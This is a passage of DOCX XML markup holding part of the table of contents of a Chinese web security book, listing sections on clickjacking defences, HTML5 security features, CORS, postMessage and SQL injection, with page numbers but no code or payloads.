        <w:t>136</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2122" w:val="left" w:leader="none"/>
          <w:tab w:pos="2124" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="102" w:after="0"/>
        <w:ind w:left="2123" w:right="0" w:hanging="598"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>frame</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>busting</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>136</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="105" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>X-Frame-Options</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>137</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1523" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="59"/>
        <w:ind w:left="1031" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:12.72pt;margin-top:19.790022pt;width:411.15pt;height:16.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:1480" coordorigin="254,396" coordsize="8223,322">
            <v:rect style="position:absolute;left:254;top:395;width:8223;height:322" filled="true" fillcolor="#dadada" stroked="false">
              <v:fill type="solid"/>
            </v:rect>
            <v:shape style="position:absolute;left:1195;top:417;width:7261;height:283" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:pos="7240" w:val="right" w:leader="dot"/>
                      </w:tabs>
                      <w:spacing w:line="282" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="2"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>HTML </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>5</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="11"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>安全</w:t>
                      <w:tab/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:spacing w:val="5"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>139</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:283;top:463;width:688;height:236" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="236" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>第 </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>6</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="-35"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>章</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <w10:wrap type="none"/>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>5.7</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>小结</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>138</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1525" w:val="left" w:leader="none"/>
          <w:tab w:pos="1526" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="536" w:after="0"/>
        <w:ind w:left="1525" w:right="0" w:hanging="494"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>签</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>139</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="80" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>新标签</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-31"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>XSS</w:t>
        <w:tab/>
        <w:t>139</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="82" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-28"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sandbox</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>140</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2122" w:val="left" w:leader="none"/>
          <w:tab w:pos="2124" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="103" w:after="0"/>
        <w:ind w:left="2123" w:right="0" w:hanging="598"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Link</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Types:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>noreferrer</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>141</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="83" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Canvas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>的妙用</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>141</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1523" w:val="left" w:leader="none"/>
          <w:tab w:pos="1524" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="57" w:after="0"/>
        <w:ind w:left="1523" w:right="0" w:hanging="492"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>其</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>他安</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>全</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>问题</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>144</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="102" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cross-Origin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Resource</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Sharing</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>144</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="83" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>postMessage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>跨窗口传递消息</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>146</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2122" w:val="left" w:leader="none"/>
          <w:tab w:pos="2124" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="103" w:after="0"/>
        <w:ind w:left="2123" w:right="0" w:hanging="598"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Storage</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>147</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1523" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="59"/>
        <w:ind w:left="1031" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>6.3</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>小结</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>150</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:pos="3711" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="134"/>
        <w:ind w:left="2552" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>第三</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>篇</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>服务器端应用安全</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1525" w:val="left" w:leader="none"/>
          <w:tab w:pos="1526" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="744" w:after="0"/>
        <w:ind w:left="1525" w:right="0" w:hanging="494"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:12.72pt;margin-top:14.440007pt;width:411.15pt;height:16.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:1552" coordorigin="254,289" coordsize="8223,322">
            <v:rect style="position:absolute;left:254;top:288;width:8223;height:322" filled="true" fillcolor="#dadada" stroked="false">
              <v:fill type="solid"/>
            </v:rect>
            <v:shape style="position:absolute;left:1195;top:308;width:7261;height:277" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:pos="7240" w:val="right" w:leader="dot"/>
                      </w:tabs>
                      <w:spacing w:line="276" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>注</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>入</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>攻击</w:t>
                      <w:tab/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:spacing w:val="5"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>152</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:283;top:354;width:688;height:236" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="236" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>第 </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>7</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="-35"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>章</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <w10:wrap type="none"/>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>注入</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>152</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="80" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>盲注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Blind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>）</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
